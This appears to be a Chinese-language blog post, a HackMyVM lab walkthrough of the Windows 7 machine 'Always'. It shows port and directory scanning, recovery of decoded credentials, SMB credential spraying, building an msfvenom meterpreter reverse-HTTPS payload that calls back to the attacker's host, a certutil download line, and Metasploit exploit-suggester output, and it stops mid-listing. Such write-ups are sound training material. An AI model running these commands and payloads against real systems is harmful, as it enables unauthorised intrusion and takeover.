{"id":823,"date":"2025-03-20T22:30:46","date_gmt":"2025-03-20T14:30:46","guid":{"rendered":"http:\/\/162.14.82.114\/?p=823"},"modified":"2025-03-20T22:30:46","modified_gmt":"2025-03-20T14:30:46","slug":"hmv-_-always","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/823\/03\/20\/2025\/","title":{"rendered":"hmv[-_-]Always"},"content":{"rendered":"<h1>Always<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412231858512.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412231858512.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20241222193353611\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412231858514.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412231858514.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20241222194026069\" style=\"zoom:33%;\" \/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/always]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nReal hackers hack time \u231b\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. \nOpen 172.20.10.3:21\nOpen 172.20.10.3:135\nOpen 172.20.10.3:139\nOpen 172.20.10.3:445\nOpen 172.20.10.3:3389\nOpen 172.20.10.3:5357\nOpen 172.20.10.3:8080\nOpen 172.20.10.3:49152\nOpen 172.20.10.3:49153\nOpen 172.20.10.3:49154\nOpen 172.20.10.3:49155\nOpen 172.20.10.3:49156\nOpen 172.20.10.3:49157\n[~] Starting Script(s)\n[&gt;] Script to be run Some(&quot;nmap -vvv -p {{port}} {{ip}}&quot;)\n\nPORT      STATE SERVICE            REASON  VERSION\n21\/tcp    open  ftp                syn-ack Microsoft ftpd\n| ftp-syst: \n|_  SYST: Windows_NT\n135\/tcp   open  msrpc              syn-ack Microsoft Windows RPC\n139\/tcp   open  netbios-ssn        syn-ack Microsoft Windows netbios-ssn\n445\/tcp   open  microsoft-ds       syn-ack Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)\n3389\/tcp  open  ssl\/ms-wbt-server? syn-ack\n|_ssl-date: 2024-12-22T11:43:22+00:00; +2s from scanner time.\n| ssl-cert: Subject: commonName=Always-PC\n| Issuer: commonName=Always-PC\n| Public Key type: rsa\n| Public Key bits: 2048\n| Signature Algorithm: sha1WithRSAEncryption\n| Not valid before: 2024-10-02T08:06:05\n| Not valid after:  2025-04-03T08:06:05\n| MD5:   80da:3027:dbd7:3cf4:9b54:ede1:b63b:cb33\n| SHA-1: 9c78:542c:e793:514b:9da3:1f67:5cc7:e5d3:16b6:28ed\n| -----BEGIN CERTIFICATE-----\n| MIIC1jCCAb6gAwIBAgIQXL\/J7WrCZa9HyZbN06QgIzANBgkqhkiG9w0BAQUFADAU\n| MRIwEAYDVQQDEwlBbHdheXMtUEMwHhcNMjQxMDAyMDgwNjA1WhcNMjUwNDAzMDgw\n| NjA1WjAUMRIwEAYDVQQDEwlBbHdheXMtUEMwggEiMA0GCSqGSIb3DQEBAQUAA4IB\n| DwAwggEKAoIBAQCgkBATZCYEI\/tTPjoB5QLF\/WrVjj6lBnRwh2\/VPBWfTcTZU+OC\n| 7EpaAqsZtt2Um9zAdmEyMWsqRsUdLb\/Mmgau7aMvohJt7NVR+U9GP8TAR2DRQ0HC\n| dlMXshPR5YQ4iOyk0kQasJ8PAoWD1zA2kJInbWxfIzR1JnbBlGlH9tNvTWK86I+z\n| 5IyDsye7IxPgFZpyYU31PVdyMgLJkuMA6LOTVfNjDz7PhNP0QfXhBPTiQ0P3EFSh\n| Vicc2hCPeV2P4TetwEnU+cYo0t+14auukbtG8aIK+Rn0SnpqdtNVHfQlh6a5F7MY\n| Ifg4X2Yom2vZKpu4IHDVp4Eyr6cRnY3m8lz5AgMBAAGjJDAiMBMGA1UdJQQMMAoG\n| CCsGAQUFBwMBMAsGA1UdDwQEAwIEMDANBgkqhkiG9w0BAQUFAAOCAQEAoBCuRGFZ\n| One8vcYQgBeYFTjG9c4\/t7sAJs5kivGuNivE1T9L6XM0I6syRCy1IMMj5uwCWr4M\n| jKSOY4bokdR4lU1G7pGZ\/nKIGggJimGvOxT2mUfUl7dZHWrtXNqlquvIyYuuLmpC\n| lum0qLH3j4gNMiS\/OW5Z3UlXFwFIA\/S3J8H0GCq23vMQWlaJ6i3b3vMZcXIxOFVk\n| +9qW9gtr7nry9D5g2t9yu\/q\/Bu5tVR\/r2ZE2ERPpRK1UM0xyiH9q7QxvO8p3ad8V\n| M2Gt+LKJTjclxUU+IWsUXu3mDX24RNfr7qroej5PnLw98CKUNqmc2H4xRWIIRaA3\n| w8MHEsc7LPVgBQ==\n|_-----END CERTIFICATE-----\n5357\/tcp  open  http               syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)\n|_http-title: Service Unavailable\n|_http-server-header: Microsoft-HTTPAPI\/2.0\n8080\/tcp  open  http               syn-ack Apache httpd 2.4.57 ((Win64))\n|_http-server-header: Apache\/2.4.57 (Win64)\n| http-methods: \n|   Supported Methods: POST OPTIONS HEAD GET TRACE\n|_  Potentially risky methods: TRACE\n|_http-title: We Are Sorry\n|_http-open-proxy: Proxy might be redirecting requests\n49152\/tcp open  msrpc              syn-ack Microsoft Windows RPC\n49153\/tcp open  msrpc              syn-ack Microsoft Windows RPC\n49154\/tcp open  msrpc              syn-ack Microsoft Windows RPC\n49155\/tcp open  msrpc              syn-ack Microsoft Windows RPC\n49156\/tcp open  msrpc              syn-ack Microsoft Windows RPC\n49157\/tcp open  msrpc              syn-ack Microsoft Windows RPC\nService Info: Host: ALWAYS-PC; OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nHost script results:\n| smb-os-discovery: \n|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)\n|   OS CPE: cpe:\/o:microsoft:windows_7::sp1:professional\n|   Computer name: Always-PC\n|   NetBIOS computer name: ALWAYS-PC\\x00\n|   Workgroup: WORKGROUP\\x00\n|_  System time: 2024-12-22T13:43:17+02:00\n| p2p-conficker: \n|   Checking for Conficker.C or higher...\n|   Check 1 (port 39463\/tcp): CLEAN (Couldn&#039;t connect)\n|   Check 2 (port 23903\/tcp): CLEAN (Couldn&#039;t connect)\n|   Check 3 (port 47754\/udp): CLEAN (Timeout)\n|   Check 4 (port 59081\/udp): CLEAN (Failed to receive data)\n|_  0\/4 checks are positive: Host is CLEAN or ports are blocked\n|_clock-skew: mean: -29m57s, deviation: 59m59s, median: 1s\n| smb2-security-mode: \n|   2:1:0: \n|_    Message signing enabled but not required\n| smb2-time: \n|   date: 2024-12-22T11:43:17\n|_  start_date: 2024-12-22T11:37:03\n| nbstat: NetBIOS name: ALWAYS-PC, NetBIOS user: &lt;unknown&gt;, NetBIOS MAC: 08:00:27:c2:65:4a (Oracle VirtualBox virtual NIC)\n| Names:\n|   ALWAYS-PC&lt;00&gt;        Flags: &lt;unique&gt;&lt;active&gt;\n|   WORKGROUP&lt;00&gt;        Flags: &lt;group&gt;&lt;active&gt;\n|   ALWAYS-PC&lt;20&gt;        Flags: &lt;unique&gt;&lt;active&gt;\n|   WORKGROUP&lt;1e&gt;        Flags: &lt;group&gt;&lt;active&gt;\n|   WORKGROUP&lt;1d&gt;        Flags: &lt;unique&gt;&lt;active&gt;\n|   \\x01\\x02__MSBROWSE__\\x02&lt;01&gt;  Flags: &lt;group&gt;&lt;active&gt;\n| Statistics:\n|   08:00:27:c2:65:4a:00:00:00:00:00:00:00:00:00:00:00\n|   00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00\n|_  00:00:00:00:00:00:00:00:00:00:00:00:00:00\n| smb-security-mode: \n|   account_used: guest\n|   authentication_level: user\n|   challenge_response: supported\n|_  message_signing: disabled (dangerous, but default)<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/always]\n\u2514\u2500$ curl -s http:\/\/$IP:8080 | html2text\n  ****** Our Site Is Under Maintenance. Please Come Back Again Later. ******\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/always]\n\u2514\u2500$ feroxbuster -u http:\/\/$IP:8080 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -d 2 -s 200 301 302 -q\n\n200      GET        8l       20w      178c http:\/\/172.20.10.3:8080\/\n301      GET        7l       20w      238c http:\/\/172.20.10.3:8080\/admin =&gt; http:\/\/172.20.10.3:8080\/admin\/<\/code><\/pre>\n<p>\u968f\u4fbf\u626b\u4e24\u4e0b\u5f97\u4e86\u3002<\/p>\n<h2>\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n<h3>\u654f\u611f\u76ee\u5f55<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412231858516.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412231858516.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20241222200203749\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u67e5\u770b\u6e90\u4ee3\u7801\u53d1\u73b0\uff1a<\/p>\n<pre><code class=\"language-bash\">&lt;body&gt;\n    &lt;div class=&quot;container&quot;&gt;\n        &lt;h2&gt;Login&lt;\/h2&gt;\n        &lt;form id=&quot;loginForm&quot; action=&quot;admin_notes.html&quot; method=&quot;POST&quot; onsubmit=&quot;return validateForm()&quot;&gt;\n            &lt;input type=&quot;text&quot; id=&quot;username&quot; name=&quot;username&quot; placeholder=&quot;Username&quot; required&gt;\n            &lt;input type=&quot;password&quot; id=&quot;password&quot; name=&quot;password&quot; placeholder=&quot;Password&quot; required&gt;\n            &lt;button type=&quot;submit&quot;&gt;Login&lt;\/button&gt;\n        &lt;\/form&gt;\n        &lt;div class=&quot;error&quot; id=&quot;errorMessage&quot;&gt;&lt;\/div&gt;\n        &lt;div class=&quot;footer&quot;&gt;2024 Always Corp. All Rights Reserved.&lt;\/div&gt;\n    &lt;\/div&gt;\n\n    &lt;script&gt;\n        function validateForm() {\n            const username = document.getElementById(&quot;username&quot;).value;\n            const password = document.getElementById(&quot;password&quot;).value;\n            const errorMessage = document.getElementById(&quot;errorMessage&quot;);\n\n            if (username === &quot;admin&quot; &amp;&amp; password === &quot;adminpass123&quot;) {\n                return true; \n            }\n\n            errorMessage.textContent = &quot;Invalid Username Or Password!&quot;;\n            return false; \n        }\n    &lt;\/script&gt;\n&lt;\/body&gt;\n&lt;\/html&gt;<\/code><\/pre>\n<p>\u65e2\u53d1\u73b0\u4e86\u4e00\u4e2a\u53ef\u7591\u7684\u8d26\u53f7\u5bc6\u7801\uff0c\u4e5f\u53d1\u73b0\u5b58\u5728\u4e00\u4e2a\u53ef\u7591\u94fe\u63a5\uff0c\u5c1d\u8bd5\u6253\u5f00\u770b\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/always]\n\u2514\u2500$ curl -s http:\/\/$IP:8080\/admin\/admin_notes.html | html2text\n\n****** Admin&#039;s Notes ******\nZnRwdXNlcjpLZWVwR29pbmdCcm8hISE=\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/always]\n\u2514\u2500$ echo &#039;ZnRwdXNlcjpLZWVwR29pbmdCcm8hISE=&#039; | base64 -d                                \nftpuser:KeepGoingBro!!!   <\/code><\/pre>\n<p>\u627e\u5230\u4e86\u4e00\u4e2aftp\u7528\u6237\uff0c\u6253\u5f00\u770b\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/always]\n\u2514\u2500$ ftp $IP                                                                                                              \nConnected to 172.20.10.3.\n220 Microsoft FTP Service\nName (172.20.10.3:kali): ftpuser\n331 Password required for ftpuser.\nPassword: \n230 User logged in.\nRemote system type is Windows_NT.\nftp&gt; ls \n229 Entering Extended Passive Mode (|||49159|)\n150 Opening ASCII mode data connection.\n10-01-24  07:17PM                   56 robots.txt\n226 Transfer complete.\nftp&gt; get robots.txt\nlocal: robots.txt remote: robots.txt\n229 Entering Extended Passive Mode (|||49161|)\n150 Opening ASCII mode data connection.\n100% |************************************************************************************************************************************************|    56      125.71 KiB\/s    00:00 ETA\n226 Transfer complete.\n56 bytes received in 00:00 (37.95 KiB\/s)\nftp&gt; cd ..\n250 CWD command successful.\nftp&gt; ls\n229 Entering Extended Passive Mode (|||49162|)\n150 Opening ASCII mode data connection.\n10-01-24  07:17PM                   56 robots.txt\n226 Transfer complete.\nftp&gt; exit\n221 Goodbye.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/always]\n\u2514\u2500$ cat robots.txt \nUser-agent: *\nDisallow: \/admins-secret-pagexxx.html\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/always]\n\u2514\u2500$ curl -s http:\/\/$IP:8080\/admin\/admins-secret-pagexxx.html\n&lt;!DOCTYPE HTML PUBLIC &quot;-\/\/IETF\/\/DTD HTML 2.0\/\/EN&quot;&gt;\n&lt;html&gt;&lt;head&gt;\n&lt;title&gt;404 Not Found&lt;\/title&gt;\n&lt;\/head&gt;&lt;body&gt;\n&lt;h1&gt;Not Found&lt;\/h1&gt;\n&lt;p&gt;The requested URL was not found on this server.&lt;\/p&gt;\n&lt;\/body&gt;&lt;\/html&gt;\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/always]\n\u2514\u2500$ curl -s http:\/\/$IP:8080\/admins-secret-pagexxx.html | html2text\n\n***** Admin&#039;s Secret Notes *****\n    * 1) Disable the firewall and Windows Defender.\n    * 2) Enable FTP and SSH.\n    * 3) Start the Apache server.\n    * 4) Don&#039;t forget to change the password for user &#039;always&#039;. Current\n      password is &quot;WW91Q2FudEZpbmRNZS4hLiE=&quot;.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/always]\n\u2514\u2500$ echo &#039;WW91Q2FudEZpbmRNZS4hLiE=&#039; | base64 -d         \nYouCantFindMe.!.!<\/code><\/pre>\n<p>\u627e\u5230\u5bc6\u7801\u4e86\uff01<\/p>\n<h3>\u7206\u7834\u7528\u6237<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/always]\n\u2514\u2500$ cat user\nftpuser\nalways\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/always]\n\u2514\u2500$ cat pass\nYouCantFindMe.!.!\nKeepGoingBro!!!\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/always]\n\u2514\u2500$ nxc smb $IP -u user -p pass      \nSMB         172.20.10.3     445    ALWAYS-PC        [*] Windows 7 Professional 7601 Service Pack 1 x64 (name:ALWAYS-PC) (domain:Always-PC) (signing:False) (SMBv1:True)\nSMB         172.20.10.3     445    ALWAYS-PC        [-] Always-PC\\ftpuser:YouCantFindMe.!.! STATUS_LOGON_FAILURE \nSMB         172.20.10.3     445    ALWAYS-PC        [-] Always-PC\\always:YouCantFindMe.!.! STATUS_LOGON_FAILURE \nSMB         172.20.10.3     445    ALWAYS-PC        [+] Always-PC\\ftpuser:KeepGoingBro!!!<\/code><\/pre>\n<p>\u53d1\u73b0\u4e86\u4e00\u4e2a\u53ef\u4ee5\u8fdb\u884c\u767b\u5f55\u7684\u51ed\u8bc1\uff0c\u63a5\u4e0b\u6765\u5c31\u662f\u6302\u9a6c\u4ee5\u53ca\u641c\u7d22flag\u4e86\u3002<\/p>\n<h2>\u63d0\u6743<\/h2>\n<p>\u53c2\u8003\u56fd\u5916\u5e08\u5085\u7684\u64cd\u4f5c\u8fdb\u884c\u5b66\u4e60\u8fa3\uff0c\u597d\u4e45\u6ca1\u7528\uff0c\u8bb0\u4e0d\u6e05\u4e86\u3002<\/p>\n<h3>\u5148\u641e\u4e00\u4e2a\u9a6c<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/always]\n\u2514\u2500$ sudo msfvenom -p windows\/x64\/meterpreter\/reverse_https LHOST=172.20.10.8 LPORT=443 -f exe &gt; shell.exe\n[sudo] password for kali: \n[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload\n[-] No arch selected, selecting arch: x64 from the payload\nNo encoder specified, outputting raw payload\nPayload size: 792 bytes\nFinal size of exe file: 7168 bytes<\/code><\/pre>\n<h3>\u7136\u540e\u8bbe\u7f6e\u76d1\u542c<\/h3>\n<pre><code>msf6 &gt; use exploit\/multi\/handler\n[*] Using configured payload generic\/shell_reverse_tcp\nmsf6 exploit(multi\/handler) &gt; set payload windows\/x64\/meterpreter\/reverse_https\npayload =&gt; windows\/x64\/meterpreter\/reverse_https\nmsf6 exploit(multi\/handler) &gt; set lhost 172.20.10.8\nlhost =&gt; 172.20.10.8\nmsf6 exploit(multi\/handler) &gt; set lport 443\nlport =&gt; 443\nmsf6 exploit(multi\/handler) &gt; run\n\n[*] Started HTTPS reverse handler on https:\/\/172.20.10.8:443<\/code><\/pre>\n<h3>\u7136\u540e\u628a\u9a6c\u4f20\u8fc7\u53bb<\/h3>\n<p>\u571f\u8033\u5176\u6587\u5b57\uff0c\u9700\u8981\u5207\u6362\u4e00\u4e0b\u952e\u76d8\u6216\u8005\u5c4f\u5e55\u952e\u76d8\u3002\u3002\u3002\u3002\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412231858517.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412231858517.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20241222204900921\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c31\u662f\u5de6\u4e0a\u89d2\u90a3\u4e2a\uff0c\u5207\u6362\u56de\u82f1\u6587\u5c31\u884c\u4e86\u3002\u767b\u8fdb\u53bbcmd\u4e0b\u8f7d\u9a6c\uff01<\/p>\n<pre><code class=\"language-bash\">certutil.exe -urlcache -split -f +file<\/code><\/pre>\n<p>\u4e5f\u884c\uff0c\u4f46\u662f\u56e0\u4e3a\u662f\u897f\u73ed\u7259\u8bed\uff0c\u6015\u51fa\u4e8b\u5c31\u76f4\u63a5\u4f7f\u7528\u6d4f\u89c8\u5668\u8fdb\u884c\u4e0b\u8f7d\u4e86\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412231858518.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412231858518.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20241222205718443\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u4e0d\u884c\u5c31\u628a\u4e0b\u9762\u7684\u571f\u8033\u5176\u5207\u6362\u6210\u7f8e\u56fd\uff0c\u7136\u540e\u5f39\u51fa\u6765\u7684\u4e00\u76f4\u70b9\u6700\u5de6\u8fb9\u7684\u5c31\u884c\u4e86\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412231858519.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412231858519.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20241222210036361\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412231858520.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412231858520.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20241222211700096\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">meterpreter &gt; sessions 1\n[*] Session 1 is already interactive.\nmeterpreter &gt; guid\n[+] Session GUID: cc968c17-62c6-45a8-b16f-bcfadbb3b16c\nmeterpreter &gt; shell\nProcess 2916 created.\nChannel 1 created.\nMicrosoft Windows [S\ufffdr\ufffdm 6.1.7601]\nTelif Hakk\ufffd (c) 2009 Microsoft Corporation. T\ufffdm haklar\ufffd sakl\ufffdd\ufffdr.\n\nC:\\Users\\ftpuser.Always-PC\\Desktop&gt;hostname\nhostname\nAlways-PC\n\nC:\\Users\\ftpuser.Always-PC\\Desktop&gt;whoami\nwhoami\nalways-pc\\ftpus<\/code><\/pre>\n<p>\u4f7f\u7528\u5176\u4ed6\u7684\u6a21\u5757\u8fdb\u884c\u4fe1\u606f\u641c\u96c6\uff1a<\/p>\n<pre><code class=\"language-bash\">C:\\Users\\ftpuser.Always-PC\\Desktop&gt;exit\nexit\nmeterpreter &gt; background \n[*] Backgrounding session 1...\nmsf6 exploit(multi\/handler) &gt; search suggest local\n\nMatching Modules\n================\n\n   #  Name                                      Disclosure Date  Rank    Check  Description\n   -  ----                                      ---------------  ----    -----  -----------\n   0  post\/multi\/recon\/local_exploit_suggester  .                normal  No     Multi Recon Local Exploit Suggester\n   1  post\/osx\/manage\/sonic_pi                  .                normal  No     OS X Manage Sonic Pi\n   2    \\_ action: Run                          .                .       .      Run Sonic Pi code\n   3    \\_ action: Stop                         .                .       .      Stop all jobs\n\nInteract with a module by name or index. For example info 3, use 3 or use post\/osx\/manage\/sonic_pi\nAfter interacting with a module you can manually set a ACTION with set ACTION &#039;Stop&#039;\n\nmsf6 exploit(multi\/handler) &gt; use 0\nmsf6 post(multi\/recon\/local_exploit_suggester) &gt; options\n\nModule options (post\/multi\/recon\/local_exploit_suggester):\n\n   Name             Current Setting  Required  Description\n   ----             ---------------  --------  -----------\n   SESSION                           yes       The session to run this module on\n   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits\n\nView the full module info with the info, or info -d command.\n\nmsf6 post(multi\/recon\/local_exploit_suggester) &gt; set SESSION 1\nSESSION =&gt; 1\nmsf6 post(multi\/recon\/local_exploit_suggester) &gt; run\n\n[*] 172.20.10.3 - Collecting local exploits for x64\/windows...\n[*] 172.20.10.3 - 196 exploit checks are being tried...\n[+] 172.20.10.3 - exploit\/windows\/local\/always_install_elevated: The target is vulnerable.\n[+] 172.20.10.3 - exploit\/windows\/local\/bypassuac_eventvwr: The target appears to be vulnerable.\n[+] 172.20.10.3 - exploit\/windows\/local\/cve_2019_1458_wizardopium: The target appears to be vulnerable.\n[+] 172.20.10.3 - exploit\/windows\/local\/cve_2020_0787_bits_arbitrary_file_move: The service is running, but could not be validated. Vulnerable Windows 7\/Windows Server 2008 R2 build detected!\n[+] 172.20.10.3 - exploit\/windows\/local\/cve_2020_1054_drawiconex_lpe: The target appears to be vulnerable.\n[+] 172.20.10.3 - exploit\/windows\/local\/cve_2021_40449: The service is running, but could not be validated. Windows 7\/Windows Server 2008 R2 build detected!\n[+] 172.20.10.3 - exploit\/windows\/local\/ms10_092_schelevator: The service is running, but could not be validated.\n[+] 172.20.10.3 - exploit\/windows\/local\/ms14_058_track_popup_menu: The target appears to be vulnerable.\n[+] 172.20.10.3 - exploit\/windows\/local\/ms15_051_client_copy_image: The target appears to be vulnerable.\n[+] 172.20.10.3 - exploit\/windows\/local\/ms15_078_atmfd_bof: The service is running, but could not be 